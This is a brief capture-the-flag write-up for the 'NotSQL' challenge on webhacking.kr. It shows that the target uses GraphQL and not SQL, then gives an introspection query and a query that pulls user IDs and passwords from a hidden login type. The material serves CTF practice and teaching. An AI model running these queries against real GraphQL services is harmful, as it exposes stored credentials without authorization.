NotSQL

URL: http://webhacking.kr:10012/arrow-up-right

From the look of it we are dealing with SQLi, but when we try different payloads nothing happens.

NotSQL.png

Inspecting the source we can see that it in fact is not an SQL, but GraphQL

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphqlarrow-up-right

Perform Introspection via {__schema{types{name,fields{name}}}} query:

Get the other table which exists in GraphQL: {login_51b48f6f7e6947fba0a88a7147d54152{userid_a7fce99fa52d173843130a9620a787ce, passwd_e31db968948082b92e60411dd15a25cd}}

Last updated